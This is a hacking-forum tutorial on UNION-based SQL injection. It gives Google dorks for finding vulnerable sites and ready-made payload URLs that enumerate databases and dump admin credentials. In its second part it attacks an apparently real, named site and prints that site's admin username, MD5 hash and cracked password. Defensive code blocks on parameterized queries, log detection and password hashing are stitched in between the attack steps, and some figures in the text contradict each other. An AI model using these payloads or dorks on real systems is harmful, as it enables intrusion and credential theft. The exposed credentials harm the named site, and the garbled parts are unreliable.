SQLi Tutorial – SQL Injection Tutorial – SQL Injection Article
SQLi (short for SQL injection, or Structured Query Language injection) is a first step into exploiting or hacking websites. It is easy to do and is a good starting point. Unfortunately, the tutorials out there are a little complicated, which is why I am writing this one. SQLi is basically just injecting queries into a database, or using a query to bypass authorization and get in as an admin.
Finding Injectable Sites
Finding SQLi is very easy; all you need to do is Google. The first thing you need to do is find some dorks
Code:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
For a more complete list, search Google for dorks :)
PART 1
Pick one of the dorks and add inurl: in front of it
(if it does not already have it), then copy and paste it
into Google. Pick one of the sites from the Google results and check them one by one.
For example, the URL of the page you are on might look like this
Code:
http://www.example.com/index.php?id=3
To check for a MySQL bug, just add "'" at the end of the URL,
for example
Code:
http://www.example.com/index.php?id=3'
Press Enter until you get an ERROR.
Getting the Number of Columns
Once you have a site ready, the first step you need to take is to find the number of columns. The easiest way to do that is with the "order by" statement. All you have to do is put ORDER BY (number)-- at the end of your URL. So it should look like this.
Code:
http://www.example.com/index.php?id=3 ORDER BY (number)--
From here on I'm switching to English, I'm tired of translating, hahaha :p
Let's say on order by 8-- you get an error page. This means that the website has 7 columns, because it will give you errors on anything over 7. If you have a bad memory you should open Notepad and write down the number of columns you find.
Finding Accessible Columns
Now that we have the number of columns, we need to get the column numbers that we can grab information from. We do this by using "UNION", "SELECT" and the number of columns. You put them together in your URL like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
For the end part of the URL (1,2,3,4,5,6,7), you put the number of columns you found in the first step. Since I found that the site I was testing had 7 columns, I put 1,2,3,4,5,6,7. Also remember to put a - in front of the id number. After you do that you should get something like this…
The page should look a bit fucked up and there should be 2 numbers on the page. These two numbers are the column numbers we can get information from. We will replace them with statements later on, so write them down or remember them.
Finding MySQL Database Version
The reason you need the database version is to see whether or not the website is worth your time, because with any MySQL database under 5 you will have to blindly guess the table and column names. If you are a beginner and you find that the database is below 5, I urge you to find a different site.
Now we take one of the numbers that we found in the step above and replace it with @@version. For example, before, our URL looked like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
Now we replace the 1 with @@version
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
Press Enter and now the page should display the database version number.
The number that we had in the first step will now be replaced with the database version number. As it shows above, the site that I am testing has a version number of 5.0.45. Since this number is 5 or above, we will continue working on this site.
Finding Database Names
Next we are going to inject the website to find the database names. We do this by replacing @@version with group_concat(schema_name) and also adding +from+information_schema.schemata-- after the last number in our URL. So now our URL should look like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
You should get something like this when you go to that url.
It will list the database names. Now, to find which one is currently in use, replace group_concat(schema_name) with concat(database()) and delete +from+information_schema.schemata. So the URL should now look like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
It will display which database is in use. You may want to write it down.
Finding Table Names
To get the table names of the current database, you need to replace concat(database()) with group_concat(table_name) and add from information_schema.tables where table_schema=database() between the last number and the --. Also remove the + signs from the union select. Now your URL should look like this
Code:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
The page should now show the Table names. You may want to write them down.
Finding Column Names
This is exactly like getting table names; you just change table_name to column_name and information_schema.tables to information_schema.columns. So your URL should look like this.
Code:
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
This should give you the column names. You may want to write them down.
Let's say they gave us back the column names
admin_username
admin_password
Getting Information
Now that we have the database name, table names, and column names, we can put them together and pull information from them. To do this we need to put the following in our URL.
Code:
http://www.example.com/index.php?id=-3 union select 1, group_concat (columnname,0x3a,columnname,0x3a) ,2,3,4,5,6,7 from databasename.tablename--
Now replace columnname with the column names you want information from. The 0x3a will make a : to separate the information for you. Put in as many column names as you want, but remember to stick to the format. Also replace databasename.tablename with the database name and the table name the columns were in. After all this your URL should look something like this.
Code:
http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--
Now you should get usernames and passwords for the admin, or whatever information you wanted to get.
Now you should know the basics of SQLi. Enjoy! I put a lot of work into this tutorial so I hope you guys like it.
If you have any questions, feel free to PM me or add me on my MSN or AIM. There are probably a few mistakes in this tutorial; I will fix them when I have time. Enjoy, all team, lmao
Credit: madun | x-habie
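Seen from the application side, every step in Part 1 works because the `id` value is pasted straight into the SQL text. The following is an added example, not part of the original tutorial or any site's code: a constructed in-memory SQLite table stands in for the MySQL backend, and the table contents, function names and three-column payload are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed payload in the tutorial's UNION SELECT shape, cut down to the
# three columns of the toy table below.
UNION_PAYLOAD = "-3 UNION SELECT 1, admin_username, admin_password FROM t_admin--"

def make_db():
    """Constructed in-memory SQLite database standing in for the MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE t_admin (admin_username TEXT, admin_password TEXT);
        INSERT INTO news VALUES (3, 'Harvest report', 'Body text');
        INSERT INTO t_admin VALUES ('demo_admin', 'demo_hash');
    """)
    return db

def get_news_vulnerable(db, raw_id):
    # Before: the parameter is concatenated into the SQL text, so everything
    # after the number is parsed as SQL (ORDER BY, UNION SELECT, a stray quote).
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = " + raw_id
    ).fetchall()

def get_news_safe(db, raw_id):
    # After: reject anything that is not a plain integer, then bind the value
    # as a parameter so it can never change the statement's structure.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)
    ).fetchall()

def handle_request(db, raw_id):
    """Return (status, rows) without echoing database error text to the client."""
    try:
        return 200, get_news_safe(db, raw_id)
    except ValueError:
        return 400, []

if __name__ == "__main__":
    db = make_db()
    print(get_news_vulnerable(db, UNION_PAYLOAD))  # admin row leaks
    print(handle_request(db, UNION_PAYLOAD))       # rejected with 400
    print(handle_request(db, "3"))                 # normal page
```

The quote test and the ORDER BY probes fail the same way against the bound-parameter version: the input never reaches the SQL parser as code, and the client gets a plain 400 instead of a database error to read.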
PART 2
What Is SQLi? ( SQL injection )
SQL injection is a basic in web hacking, and it's the first way to get started exploiting sites.
How To Find SQLi Vuln Sites, & Inject Them:
This is very simple: just use these dorks with a SQLi scanner, or Google, then check every site by yourself. Now, to check manually if a site is SQLi vuln, just add ' at the end of the URL. For example, we have our target,
Code:
http://www.cocobod.gh/news_details.php?id=30
Now, we want to check if the site is SQLi vuln, so we add ' at the end:
Code:
http://www.cocobod.gh/news_details.php?id=30'
If we get an error, that means that it is vuln : )
So, now we move to the next step.
How To Find Columns Count :
After you have your vuln site, you need to know its column count. To do it, just add "order by X--" at the end of the URL,
where X is a number from 1 to unlimited :)
For example, we have our target server and we try to count columns.
We add order by 1-- at the end, then order by 2--, etc., always increasing the number till you get an error in your website like this one:
So, in our target server, we have tried this:
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 5th column does not exist, which means that the column count is 7 : D
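The request sequence above is also exactly what shows up in the web server's access log, which makes this stage easy to detect. The following is an added example, not from the original post: a small detector run over constructed log entries, where the client addresses (documentation ranges), signature names and the probe threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed (client, request target) pairs as they would appear URL-encoded
# in an access log.
SAMPLE_LOG = [
    ("203.0.113.7", "/news_details.php?id=30"),
    ("203.0.113.7", "/news_details.php?id=30'"),
    ("203.0.113.7", "/news_details.php?id=30%20order%20by%201--"),
    ("203.0.113.7", "/news_details.php?id=30+ORDER+BY+2--"),
    ("203.0.113.7", "/news_details.php?id=30%20order%20by%208--"),
    ("203.0.113.7", "/news_details.php?id=30+union+select+1,2,3,4,5,@@version,7--"),
    ("198.51.100.4", "/news_details.php?id=31"),
    ("198.51.100.4", "/search.php?q=order+by+mail"),  # benign look-alike
]

ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "trailing_quote": re.compile(r"=\d+'"),
}

def analyse(log, min_probes=3):
    """Return {client: sorted finding names} for clients that look like SQLi probing."""
    findings = defaultdict(set)
    probes = defaultdict(set)
    for client, target in log:
        # Decode %20 and + first, otherwise the keywords never line up.
        query = unquote_plus(target.partition("?")[2])
        for name, pattern in SIGNATURES.items():
            if pattern.search(query):
                findings[client].add(name)
        probes[client].update(int(n) for n in ORDER_BY.findall(query))
    # One ORDER BY <n> is unremarkable; several distinct values from the same
    # client is the column-count enumeration shown in the listing above.
    for client, numbers in probes.items():
        if len(numbers) >= min_probes:
            findings[client].add("order_by_enumeration")
    return {client: sorted(names) for client, names in findings.items()}

if __name__ == "__main__":
    for client, names in analyse(SAMPLE_LOG).items():
        print(client, names)
```

These patterns are heuristics for triage and alerting; the fix is still parameterized queries on the server side.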
How to Find The Accessible Columns :
Now, we know that column count is 4; the next step is to check for accessible columns. To do that, we use this query "UNION SELECT number,of,columns--" like this:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
You will get something like this :
That means that we can get information from the site from the 6th, the 2nd, and the 3rd column : D, haha we got the used columns : D.
How To Get MySQL DB Version :
We need to know the MySQL DB version to know if we can exploit this site or not, because every site that is using MySQL 4.x.x you can't work on, but every 5.x.x or above is exploitable : ) So to know the MySQL DB version, just replace the number of the used column with "@@version".
For example :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
That means that we can continue working on this site .
How To Find Database Name :
Now, we are going to inject the site to know the DB name.
To do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Now, to get the one the website uses, replace "group_concat(schema_name)" with "concat(database())", for example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Congrats, you got the used DB :)
How to Get The Table Names :
Now we need to get the table names. To do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of the column numbers.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
How To Get Column Names :
To get column names, we will use these queries:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
How To Get Informations From Columns :
Now we are at our final step: we will get the admin info from the columns. How to do it?
Simple, follow this example:
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
So our exploit will be like this :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Now we need to decrypt the password, which is encrypted in MD5.
Go to http://www.md5decrypter.co.uk/, paste your hash, fill in the captcha and click on decrypt; with a little luck, you will get the pass like here : )
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
Et voilà, we have successfully injected a website, and got the admin info : D
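The lookup step above only works because unsalted MD5 maps every password to one fixed, fast-to-compute hash, so a precomputed table answers it instantly. The following is an added example, not from the original post: it contrasts that storage with a salted, iterated hash (PBKDF2-HMAC-SHA256 from Python's standard library); the sample password, word list, record format and iteration count are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor; tune to your hardware

def md5_hex(password):
    """How the site in the tutorial stored passwords: one unsalted MD5."""
    return hashlib.md5(password.encode()).hexdigest()

def build_lookup(wordlist):
    # What an online "MD5 decrypter" amounts to: a precomputed hash -> password
    # table. It works because the same password always gives the same hash.
    return {md5_hex(word): word for word in wordlist}

def hash_password(password, salt=None):
    """Salted, slow hash; returns a self-describing record for the database."""
    salt = salt or os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${derived.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, derived_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(derived_hex)
        rounds = int(iterations)
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(derived, expected)

if __name__ == "__main__":
    password = "demo-password-1"  # constructed sample value
    table = build_lookup(["letmein", "demo-password-1", "qwerty"])
    print("unsalted MD5 found in table:", table.get(md5_hex(password)))
    first, second = hash_password(password), hash_password(password)
    print("same password, different records:", first != second)
    print("verify:", verify_password(password, first))
```

With a random per-user salt, a leaked record cannot be answered from a shared table, and each guess costs the full iteration count.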
I copy-pasted this article after adventuring around looking for useful articles. Please study it... I'm still learning too, hahaha :D